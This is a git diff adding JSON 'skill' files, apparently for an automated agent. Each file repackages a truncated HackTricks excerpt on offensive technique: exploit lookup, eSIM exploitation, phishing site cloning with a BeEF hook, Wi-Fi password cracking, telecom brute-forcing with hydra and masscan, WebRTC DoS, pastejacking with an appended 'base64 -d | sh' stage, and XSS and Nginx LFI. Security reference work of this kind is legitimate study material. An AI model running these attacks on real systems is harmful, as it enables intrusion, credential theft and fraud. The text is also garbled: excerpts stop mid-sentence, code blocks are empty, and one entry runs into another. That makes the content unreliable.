+ "searchsploit apache mod_ssl #Other example",
+ "searchsploit -m 7618 #Paste the exploit in current directory",
+ "searchsploit -p 7618[.c] #Show complete path",
+ "searchsploit -x 7618[.c] #Open vi to inspect the exploit",
+ "searchsploit --nmap file.xml #Search vulns inside an nmap xml result"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/search-exploits.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_hacking_f18a5b598b50.json b/skills/generic_hacking_f18a5b598b50.json
new file mode 100644
index 0000000..7731063
--- /dev/null
+++ b/skills/generic_hacking_f18a5b598b50.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_hacking_f18a5b598b50",
+ "category": "generic-hacking",
+ "title": "esim javacard exploitation",
+ "description": "# eSIM / Java Card VM Exploitation\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Overview\nEmbedded SIMs (eSIMs) are implemented as **Embedded UICC (eUICC)** smart-cards that run a **Java Card Virtual Machine (JC VM)** on top of a secure element. \nBecause profiles and applets can be provisioned *over-the-air* (OTA) via Remote SIM Provisioning (RSP), any memory-safety flaw inside the JC VM instantly becomes a remote code-execution primitive **inside the most privileged component of the hand",
+ "payloads": [
+ "# eSIM / Java Card VM Exploitation",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Embedded SIMs (eSIMs) are implemented as **Embedded UICC (eUICC)** smart-cards that run a **Java Card Virtual Machine (JC VM)** on top of a secure element.",
+ "Because profiles and applets can be provisioned *over-the-air* (OTA) via Remote SIM Provisioning (RSP), any memory-safety flaw inside the JC VM instantly becomes a remote code-execution primitive **inside the most privileged component of the handset**.",
+ "This page describes a real-world full compromise of Kigen\u2019s eUICC (Infineon SLC37 ESA1M2, ARM SC300) caused by missing type-safety checks in the `getfield` and `putfield` bytecodes. The same technique can be re-used against other vendors that omit on-card byte-code verification.",
+ "## Attack Surface",
+ "1. **Remote Application Management (RAM)**",
+ "eSIM profiles may embed arbitrary Java Card applets. Provisioning is performed with standard APDUs that can be tunnelled through SMS-PP (Short Message Service Point-to-Point) or HTTPS. If an attacker owns (or steals) the **RAM keys** for a profile, they can `INSTALL`/`LOAD` a malicious applet remotely.",
+ "2. **Java Card byte-code execution**",
+ "After installation, the applet executes inside the VM. Missing run-time checks allow memory corruption.",
+ "### 2024\u20132025 ecosystem changes",
+ "* **GSMA TS.48 v7.0 (18 Jun 2025)** removed public RAM keysets from the Generic Test Profile and blocks `INSTALL` unless randomized keys are provided; cached v\u22646 profiles still expose static RAM keys and remain exploitable.",
+ "* **GSMA AN\u20112025\u201107 (09 Jul 2025)** recommends on-card bytecode verification; most eUICCs still skip full verification so VM memory bugs stay reachable after applet install.",
+ "* **Kigen OTA hardening (Jul 2025)** blocks applet loading when legacy TS.48 test profiles are active and adds runtime checks, but unpatched devices stay vulnerable."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-hacking/esim-javacard-exploitation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_019225cf3e33.json b/skills/generic_methodologies_and_resources_019225cf3e33.json
new file mode 100644
index 0000000..8fc4c6d
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_019225cf3e33.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_019225cf3e33",
+ "category": "generic-methodologies-and-resources",
+ "title": "pdf file analysis",
+ "description": "# PDF File analysis\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)\n\nThe PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To under",
+ "payloads": [
+ "# PDF File analysis",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "**For further details check:** [**https://trailofbits.github.io/ctf/forensics/**](https://trailofbits.github.io/ctf/forensics/)",
+ "The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.",
+ "For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:",
+ "- Invisible layers",
+ "- XMP metadata format by Adobe",
+ "- Incremental generations",
+ "- Text with the same color as the background",
+ "- Text behind images or overlapping images",
+ "- Non-displayed comments",
+ "For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.",
+ "## Common Malicious Constructs",
+ "Attackers often abuse specific PDF objects and actions that automatically execute when the document is opened or interacted with. Keywords worth hunting for:",
+ "* **/OpenAction, /AA** \u2013 automatic actions executed on open or on specific events."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_0a3ff7af24ad.json b/skills/generic_methodologies_and_resources_0a3ff7af24ad.json
new file mode 100644
index 0000000..dbcf249
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_0a3ff7af24ad.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_0a3ff7af24ad",
+ "category": "generic-methodologies-and-resources",
+ "title": "clone a website",
+ "description": "# Cloning a Website\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\nFor a phishing assessment sometimes it might be useful to completely **clone/dump a website**.\n\nNote that you can add also some payloads to the cloned website like a BeEF hook to \"control\" the tab of the user.\n\nThere are different tools you can use for this purpose:\n\n## wget\n\n```bash\nwget --mirror --page-requisites --convert-links --adjust-extension \ncd \npython3 -m http.server 8000\n```\n\n## goclone\n\n```bash\n#https:",
+ "payloads": [
+ "# Cloning a Website",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "For a phishing assessment sometimes it might be useful to completely **clone/dump a website**.",
+ "Note that you can add also some payloads to the cloned website like a BeEF hook to \"control\" the tab of the user.",
+ "There are different tools you can use for this purpose:",
+ "## wget",
+ "```bash",
+ "wget --mirror --page-requisites --convert-links --adjust-extension ",
+ "cd ",
+ "python3 -m http.server 8000",
+ "## goclone",
+ "```bash",
+ "#https://github.com/imthaghost/goclone",
+ "goclone ",
+ "## Social Engineering Toolit"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_0c228278914f.json b/skills/generic_methodologies_and_resources_0c228278914f.json
new file mode 100644
index 0000000..3cd90fa
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_0c228278914f.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_0c228278914f",
+ "category": "generic-methodologies-and-resources",
+ "title": "class pollution pythons prototype pollution",
+ "description": "# Class Pollution (Python's Prototype Pollution)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Example\n\nCheck how is possible to pollute classes of objects with strings:\n\n```python\nclass Company: pass\nclass Developer(Company): pass\nclass Entity(Developer): pass\n\nc = Company()\nd = Developer()\ne = Entity()\n\nprint(c) #<__main__.Company object at 0x1043a72b0>\nprint(d) #<__main__.Developer object at 0x1041d2b80>\nprint(e) #<__main__.Entity object at 0x1041d2730>\n\ne.__class__.__qualname_",
+ "payloads": [
+ "# Class Pollution (Python's Prototype Pollution)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Example",
+ "Check how is possible to pollute classes of objects with strings:",
+ "```python",
+ "class Company: pass",
+ "class Developer(Company): pass",
+ "class Entity(Developer): pass",
+ "c = Company()",
+ "d = Developer()",
+ "e = Entity()",
+ "print(c) #<__main__.Company object at 0x1043a72b0>",
+ "print(d) #<__main__.Developer object at 0x1041d2b80>",
+ "print(e) #<__main__.Entity object at 0x1041d2730>",
+ "e.__class__.__qualname__ = 'Polluted_Entity'"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_0d0401f97862.json b/skills/generic_methodologies_and_resources_0d0401f97862.json
new file mode 100644
index 0000000..e6d4374
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_0d0401f97862.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_0d0401f97862",
+ "category": "generic-methodologies-and-resources",
+ "title": "bruteforce hash few chars",
+ "description": "# Bruteforce Hash Few Chars\n\n{{#include ../../banners/hacktricks-training.md}}\n\n```python\nimport hashlib\n\ntarget = '2f2e2e' #/..\ncandidate = 0\nwhile True:\n plaintext = str(candidate)\n hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()\n if hash[-1*(len(target)):] == target: #End in target\n print('plaintext:\"' + plaintext + '\", md5:' + hash)\n break\n candidate = candidate + 1\n```\n\n```python\n#From isHaacK\nimport hashlib\nfrom multiprocessing import Process, Queue, cpu",
+ "payloads": [
+ "# Bruteforce Hash Few Chars",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "```python",
+ "import hashlib",
+ "target = '2f2e2e' #/..",
+ "candidate = 0",
+ "while True:",
+ "plaintext = str(candidate)",
+ "hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()",
+ "if hash[-1*(len(target)):] == target: #End in target",
+ "print('plaintext:\"' + plaintext + '\", md5:' + hash)",
+ "candidate = candidate + 1",
+ "```python",
+ "#From isHaacK",
+ "import hashlib"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_1f3d224f39be.json b/skills/generic_methodologies_and_resources_1f3d224f39be.json
new file mode 100644
index 0000000..1af61a0
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_1f3d224f39be.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_1f3d224f39be",
+ "category": "generic-methodologies-and-resources",
+ "title": "zips tricks",
+ "description": "# ZIPs tricks\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:\n\n- **`unzip`**: Reveals why a zip file may not decompress.\n- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.\n- **`zipinfo`**: Lists contents of a zip file without extracting them.\n- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zi",
+ "payloads": [
+ "# ZIPs tricks",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:",
+ "- **`unzip`**: Reveals why a zip file may not decompress.",
+ "- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.",
+ "- **`zipinfo`**: Lists contents of a zip file without extracting them.",
+ "- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.",
+ "- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.",
+ "The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.",
+ "It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.",
+ "## Anti-reversing tricks in APKs using manipulated ZIP headers",
+ "Modern Android malware droppers use malformed ZIP metadata to break static tools (jadx/apktool/unzip) while keeping the APK installable on-device. The most common tricks are:",
+ "- Fake encryption by setting the ZIP General Purpose Bit Flag (GPBF) bit 0",
+ "- Abusing large/custom Extra fields to confuse parsers",
+ "- File/directory name collisions to hide real artifacts (e.g., a directory named `classes.dex/` next to the real `classes.dex`)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_1f98f58fa2c0.json b/skills/generic_methodologies_and_resources_1f98f58fa2c0.json
new file mode 100644
index 0000000..7156170
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_1f98f58fa2c0.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_1f98f58fa2c0",
+ "category": "generic-methodologies-and-resources",
+ "title": "interesting windows registry keys",
+ "description": "# Interesting Windows Registry Keys\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n### **Windows Version and Owner Info**\n\n- Located at **`Software\\Microsoft\\Windows NT\\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.\n\n### **Computer Name**\n\n- The hostname is found under **`System\\ControlSet001\\Control\\ComputerName\\ComputerName`**.\n\n### **Time Zone Setting**\n\n- The system's time zone is store",
+ "payloads": [
+ "# Interesting Windows Registry Keys",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "### **Windows Version and Owner Info**",
+ "- Located at **`Software\\Microsoft\\Windows NT\\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.",
+ "### **Computer Name**",
+ "- The hostname is found under **`System\\ControlSet001\\Control\\ComputerName\\ComputerName`**.",
+ "### **Time Zone Setting**",
+ "- The system's time zone is stored in **`System\\ControlSet001\\Control\\TimeZoneInformation`**.",
+ "### **Access Time Tracking**",
+ "- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:",
+ "`fsutil behavior set disablelastaccess 0`",
+ "### Windows Versions and Service Packs",
+ "- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.",
+ "### Enabling Last Access Time",
+ "- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_216de6f97fc5.json b/skills/generic_methodologies_and_resources_216de6f97fc5.json
new file mode 100644
index 0000000..86f3767
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_216de6f97fc5.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_216de6f97fc5",
+ "category": "generic-methodologies-and-resources",
+ "title": "wifi pcap analysis",
+ "description": "# Wifi Pcap Analysis\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Check BSSIDs\n\nWhen you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:\n\n.png>)\n\n.png>)\n\n### Brute Force\n\nOne of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force",
+ "payloads": [
+ "# Wifi Pcap Analysis",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Check BSSIDs",
+ "When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_:",
+ ".png>)",
+ ".png>)",
+ "### Brute Force",
+ "One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:",
+ "```bash",
+ "aircrack-ng -w pwds-file.txt -b file.pcap",
+ "For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.",
+ "## Data in Beacons / Side Channel",
+ "If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == \"NAMEofNETWORK\"` search inside the filtered packets for suspicious strings.",
+ "## Find Unknown MAC Addresses in A Wifi Network",
+ "The following link will be useful to find the **machines sending data inside a Wifi Network**:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_2377b431f2dd.json b/skills/generic_methodologies_and_resources_2377b431f2dd.json
new file mode 100644
index 0000000..caa8b98
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_2377b431f2dd.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_2377b431f2dd",
+ "category": "generic-methodologies-and-resources",
+ "title": "telecom network exploitation",
+ "description": "# Telecom Network Exploitation (GTP / Roaming Environments)\n\n{{#include ../../banners/hacktricks-training.md}}\n\n> [!NOTE]\n> Mobile-core protocols (GPRS Tunnelling Protocol \u2013 GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC ",
+ "payloads": [
+ "# Telecom Network Exploitation (GTP / Roaming Environments)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "> [!NOTE]",
+ "> Mobile-core protocols (GPRS Tunnelling Protocol \u2013 GTP) often traverse semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**. The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.",
+ "## 1. Recon & Initial Access",
+ "### 1.1 Default OSS / NE Accounts",
+ "A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, \u2026 A dedicated wordlist dramatically increases brute-force success:",
+ "```bash",
+ "hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt",
+ "If the device exposes only a management VRF, pivot through a jump host first (see section \u00abSGSN Emu Tunnel\u00bb below).",
+ "### 1.2 Host Discovery inside GRX/IPX",
+ "Most GRX operators still allow **ICMP echo** across the backbone. Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners:",
+ "```bash",
+ "masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55",
+ "## 2. Enumerating Subscribers \u2013 `cordscan`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_26e1b3368ca3.json b/skills/generic_methodologies_and_resources_26e1b3368ca3.json
new file mode 100644
index 0000000..df8cee8
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_26e1b3368ca3.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_26e1b3368ca3",
+ "category": "generic-methodologies-and-resources",
+ "title": "usb keystrokes",
+ "description": "# USB Keystrokes\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nIf you have a pcap containing the communication via USB of a keyboard like the following one:\n\n.png>)\n\nUSB keyboards usually speak the HID **boot protocol**, so every interrupt transfer towards the host is only 8 bytes long: one byte of modifier bits (Ctrl/Shift/Alt/Super), one reserved byte, and up to six keycodes per report. Decoding those bytes is enough to rebuild everything that was typed",
+ "payloads": [
+ "# USB Keystrokes",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "If you have a pcap containing the communication via USB of a keyboard like the following one:",
+ ".png>)",
+ "USB keyboards usually speak the HID **boot protocol**, so every interrupt transfer towards the host is only 8 bytes long: one byte of modifier bits (Ctrl/Shift/Alt/Super), one reserved byte, and up to six keycodes per report. Decoding those bytes is enough to rebuild everything that was typed.",
+ "## USB HID report basics",
+ "The typical IN report looks like:",
+ "| Byte | Meaning |",
+ "| --- | --- |",
+ "| 0 | Modifier bitmap (`0x02` = Left Shift, `0x20` = Right Alt, etc.). Multiple bits can be set simultaneously. |",
+ "| 1 | Reserved/padding but often reused by gaming keyboards for vendor data. |",
+ "| 2-7 | Up to six concurrent keycodes in USB usage ID format (`0x04 = a`, `0x1E = 1`). `0x00` means \"no key\". |",
+ "Keyboards without NKRO usually send `0x01` in byte 2 when more than six keys are pressed to signal \"rollover\". Understanding this layout helps when you only have the raw `usb.capdata` bytes.",
+ "## Extracting HID data from a PCAP",
+ "### Wireshark workflow"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_2b0e140eec1c.json b/skills/generic_methodologies_and_resources_2b0e140eec1c.json
new file mode 100644
index 0000000..3801b70
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_2b0e140eec1c.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_2b0e140eec1c",
+ "category": "generic-methodologies-and-resources",
+ "title": "webrtc dos",
+ "description": "# WebRTC DoS\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**This issue was found in this blog post:** [**https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/**](https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/)\n\nThe described vulnerability in WebRTC media servers arises from a **race condition** during the initialization of media sessions, specifically between the **ICE media consent verification** and the **DTLS traf",
+ "payloads": [
+ "# WebRTC DoS",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**This issue was found in this blog post:** [**https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/**](https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/)",
+ "The described vulnerability in WebRTC media servers arises from a **race condition** during the initialization of media sessions, specifically between the **ICE media consent verification** and the **DTLS traffic initiation**. Here\u2019s a detailed breakdown:",
+ "### Vulnerability Origin",
+ "1. **UDP Port Allocation:** When a user initiates a WebRTC call, the media server allocates UDP ports for handling the media streams, with the IP and port communicated via signaling.",
+ "2. **ICE and STUN Processes:** The user's browser uses ICE for media consent verification, utilizing STUN to determine the connection path to the media server.",
+ "3. **DTLS Session:** Following successful STUN verification, a DTLS session starts to establish SRTP master keys, switching to SRTP for the media stream.",
+ "### Exploitation Mechanism",
+ "- **Race Condition Exploitation:** An attacker can exploit a race condition by sending a DTLS ClientHello message before the legitimate user, potentially using an invalid cipher suite like `TLS_NULL_WITH_NULL_NULL`. This causes a DTLS error at the server, preventing the SRTP session from being established.",
+ "### Attack Process",
+ "- **Port Scanning:** The attacker needs to guess which UDP ports are handling incoming media sessions, sending ClientHello messages with the null cipher suite to these ports to trigger the vulnerability.",
+ "- **Diagram of Attack:** The sequence involves multiple ClientHello messages sent by the attacker to the server, interleaved with legitimate signaling and DTLS messages, leading to a handshake failure due to the erroneous cipher suite.",
+ "### Testing and Mitigation",
+ "- **Safe Testing:** Using tools like Scapy, attackers replay DTLS ClientHello messages targeting specific media ports. For ethical testing, modifications to Chromium (e.g., `JsepTransport::AddRemoteCandidates`) were used to mimic victim behavior safely."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/generic_methodologies_and_resources_2b9569534157.json b/skills/generic_methodologies_and_resources_2b9569534157.json
new file mode 100644
index 0000000..3a2f1ac
--- /dev/null
+++ b/skills/generic_methodologies_and_resources_2b9569534157.json
@@ -0,0 +1,27 @@
+{
+ "id": "generic_methodologies_and_resources_2b9569534157",
+ "category": "generic-methodologies-and-resources",
+ "title": "clipboard hijacking",
+ "description": "# Clipboard Hijacking (Pastejacking) Attacks\n\n{{#include ../../banners/hacktricks-training.md}}\n\n> \"Never paste anything you did not copy yourself.\" \u2013 old but still valid advice\n\n## Overview\n\nClipboard hijacking \u2013 also known as *pastejacking* \u2013 abuses the fact that users routinely copy-and-paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or Desktop application) programmatically places attacker-controlled text into the system clip",
+ "payloads": [
+ "# Clipboard Hijacking (Pastejacking) Attacks",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "> \"Never paste anything you did not copy yourself.\" \u2013 old but still valid advice",
+ "## Overview",
+ "Clipboard hijacking \u2013 also known as *pastejacking* \u2013 abuses the fact that users routinely copy-and-paste commands without inspecting them. A malicious web page (or any JavaScript-capable context such as an Electron or Desktop application) programmatically places attacker-controlled text into the system clipboard. Victims are encouraged, normally by carefully crafted social-engineering instructions, to press **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), or open a terminal and *paste* the clipboard content, immediately executing arbitrary commands.",
+ "Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer.",
+ "## Forced copy buttons and hidden payloads (macOS one-liners)",
+ "Some macOS infostealers clone installer sites (e.g., Homebrew) and **force use of a \u201cCopy\u201d button** so users cannot highlight only the visible text. The clipboard entry contains the expected installer command plus an appended Base64 payload (e.g., `...; echo | base64 -d | sh`), so a single paste executes both while the UI hides the extra stage.",
+ "## JavaScript Proof-of-Concept",
+ "```html",
+ "",
+ "",
+ "\n```\n\n### v-bind with src or href\nBinding a user string ",
+ "payloads": [
+ "# Vue.js",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## XSS Sinks in Vue.js",
+ "### v-html Directive",
+ "The `v-html` directive renders **raw** HTML, so any `"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/vuejs.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_16d6108a64f4.json b/skills/network_services_pentesting_16d6108a64f4.json
new file mode 100644
index 0000000..8b8b2bb
--- /dev/null
+++ b/skills/network_services_pentesting_16d6108a64f4.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_16d6108a64f4",
+ "category": "network-services-pentesting",
+ "title": "nginx",
+ "description": "# Nginx\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n## Missing root location \n\nWhen configuring the Nginx server, the **root directive** plays a critical role by defining the base directory from which files are served. Consider the example below:\n\n```bash\nserver {\n root /etc/nginx;\n\n location /hello.txt {\n try_files $uri $uri/ =404;\n proxy_pass http://127.0.0.1:8080/;\n }\n}\n",
+ "payloads": [
+ "# Nginx",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Missing root location ",
+ "When configuring the Nginx server, the **root directive** plays a critical role by defining the base directory from which files are served. Consider the example below:",
+ "```bash",
+ "server {",
+ "root /etc/nginx;",
+ "location /hello.txt {",
+ "try_files $uri $uri/ =404;",
+ "proxy_pass http://127.0.0.1:8080/;",
+ "In this configuration, `/etc/nginx` is designated as the root directory. This setup allows access to files within the specified root directory, such as `/hello.txt`. However, it's crucial to note that only a specific location (`/hello.txt`) is defined. There's no configuration for the root location (`location / {...}`). This omission means that the root directive applies globally, enabling requests to the root path `/` to access files under `/etc/nginx`.",
+ "A critical security consideration arises from this configuration. A simple `GET` request, like `GET /nginx.conf`, could expose sensitive information by serving the Nginx configuration file located at `/etc/nginx/nginx.conf`. Setting the root to a less sensitive directory, like `/etc`, could mitigate this risk, yet it still may allow unintended access to other critical files, including other configuration files, access logs, and even encrypted credentials used for HTTP basic authentication.",
+ "## Alias LFI Misconfiguration ",
+ "In the configuration files of Nginx, a close inspection is warranted for the \"location\" directives. A vulnerability known as Local File Inclusion (LFI) can be inadvertently introduced through a configuration that resembles the following:",
+ "location /imgs {"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/nginx.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_17b0c4ad6a6b.json b/skills/network_services_pentesting_17b0c4ad6a6b.json
new file mode 100644
index 0000000..b7d0535
--- /dev/null
+++ b/skills/network_services_pentesting_17b0c4ad6a6b.json
